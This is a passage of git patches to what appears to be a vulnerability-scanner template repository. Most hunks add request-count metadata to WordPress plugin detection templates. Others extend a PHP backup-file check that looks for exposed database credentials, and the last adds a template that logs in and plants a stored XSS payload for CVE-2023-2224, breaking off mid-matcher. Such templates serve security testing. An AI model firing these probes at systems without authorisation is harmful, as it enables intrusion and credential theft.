diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 784ba22c8a..4d6dd14d25 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 72ff55e58a..7ca0870ed6 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
+    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 8cfaa0f5a9..4f0d9be568 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index 85900a01a7..f3c481b824 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
+    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index a7ccde0b49..ba214fd7ea 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
+    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 422664a98c..8f5fe8d9a5 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index f0af3a748a..0458b13354 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
+    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index f89f1a20b3..d570be07bf 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
+    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index 01fb12d0ad..ee05e3add8 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
+    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index 1773857e15..df2487955f 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
+    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index bcd1509c68..79ff01211c 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
+    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index c6aca20a60..23414b3d1d 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index 56dfdf4a59..fba45020e4 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 810fc82cde..0178c8e9fb 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
+    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml
index 2276545093..017cf76f11 100644
--- a/http/technologies/wordpress/plugins/wp-seopress.yaml
+++ b/http/technologies/wordpress/plugins/wp-seopress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-seopress/
   metadata:
+    max-request: 1
     plugin_namespace: wp-seopress
     wpscan: https://wpscan.com/plugin/wp-seopress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index 783d381ed8..a04ddc6003 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
+    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index 27f6d46c2b..bc83478f06 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
+    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index ab61cc0338..dedd2e23b6 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
+    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 5f6fbc1f75..03cd7137a8 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index d67150d038..a68d4b7d78 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
+    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index beeba7ca69..bf9dfc3ad8 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index c225df7bfd..47911a86a5 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index aaad04cb76..1c25b6f488 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
+    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index ff750a7d2a..b36317acd8 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
+    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index f1e7595ccd..5eb35dd17e 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
+    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index 4b2769ee46..ceb2b8d600 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
+    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From fa6c8f9bb68e5229bdad7d633f8c330a62030610 Mon Sep 17 00:00:00 2001
From: Pugalarasan <75373225+0xPugazh@users.noreply.github.com>
Date: Mon, 2 Oct 2023 15:37:48 +0530
Subject: [PATCH 0650/1090] Update php-backup-files.yaml

---
 http/exposures/backups/php-backup-files.yaml | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/http/exposures/backups/php-backup-files.yaml b/http/exposures/backups/php-backup-files.yaml
index 1394d02f9a..81c6bb2b68 100644
--- a/http/exposures/backups/php-backup-files.yaml
+++ b/http/exposures/backups/php-backup-files.yaml
@@ -2,7 +2,7 @@ id: php-backup-files
 
 info:
   name: PHP Source - Backup File Information Disclosure
-  author: StreetOfHackerR007,pwnhxl,mastercho
+  author: StreetOfHackerR007,pwnhxl,mastercho,0xpugazh
   severity: medium
   metadata:
     max-request: 1196
@@ -62,6 +62,7 @@ http:
         - /wp-login.php
         - /config.php
         - /config
+        - /const.DB.php.bak
 
       bakext:
         - ".~"
@@ -114,7 +115,8 @@ http:
           - "$_REQUEST["
           - "$_SERVER["
           - "'DB_PASSWORD'"
-          - "define('DB_"
+          - "'DBPASS'"
+          - "define('DB"
         condition: or
 
       - type: word

From 63dcb68b75e1a71cfa5b68800ed68c9bad82747d Mon Sep 17 00:00:00 2001
From: Luis Felipe 
Date: Mon, 2 Oct 2023 08:57:09 -0300
Subject: [PATCH 0651/1090] Create CVE-2023-2224.yaml

---
 http/cves/2023/CVE-2023-2224.yaml | 51 +++++++++++++++++++++++++++++++
 1 file changed, 51 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-2224.yaml

diff --git a/http/cves/2023/CVE-2023-2224.yaml b/http/cves/2023/CVE-2023-2224.yaml
new file mode 100644
index 0000000000..f9ab0eca4d
--- /dev/null
+++ b/http/cves/2023/CVE-2023-2224.yaml
@@ -0,0 +1,51 @@
+id: CVE-2023-2224
+
+info:
+  name: Seo By 10Web < 1.2.7 - Admin+ Stored XSS
+  author: luisfelipe146
+  severity: medium
+  description: |
+    The SEO by 10Web WordPress plugin before 1.2.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
+  reference:
+    - https://wpscan.com/vulnerability/a76b6d22-1e00-428a-8a04-12162bd0d992
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-2224
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2224
+    - https://packetstormsecurity.com/files/173725/WordPress-Seo-By-10Web-Cross-Site-Scripting.html
+  classification:
+    cve-id: CVE-2023-2224
+  metadata:
+    max-request: 2
+    verified: true
+  tags: cve,cve2023,wordpress,wp-plugin,xss,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In
+
+      - |
+        POST /wp-admin/admin.php?page=wdseo_sitemap&id_message=1 HTTP/1.1
+        Host: {{Hostname}}
+
+        task=save&wd_settings%5Bsitemap%5D=1&wd_settings%5Bbing_verification%5D=&wd_settings%5Byandex_verification%5D=&wd_settings%5Bnotify_google%5D=0&wd_settings%5Bnotify_bing%5D=0&wd_settings%5Badditional_pages%5D%5B%5D=&wd_settings%5Badditional_pages%5D%5Bpage_url%5D%5B%5D=%22%3E%3Caudio+src%3Dx+onerror%3Dconfirm%28%22XSS%22%29%3E&wd_settings%5Badditional_pages%5D%5Bpriority%5D%5B%5D=0&wd_settings%5Badditional_pages%5D%5Bfrequency%5D%5B%5D=always&wd_settings%5Badditional_pages%5D%5Blast_changed%5D%5B%5D=&wd_settings%5Bexclude_post_types%5D%5B%5D=&wd_settings%5Bexclude_taxonomies%5D%5B%5D=&wd_settings%5Bexclude_archives%5D%5B%5D=&wd_settings%5Bexclude_posts%5D=&wd_settings%5Bsitemap_image%5D=0&wd_settings%5Bsitemap_video%5D=0&wd_settings%5Bsitemap_stylesheet%5D=1&wd_settings%5Blimit%5D=1000&wd_settings%5Bautoupdate_sitemap%5D=0&nonce_wdseo=b16eae563d&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwdseo_sitemap%26id_message%3D1
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "value=\"\">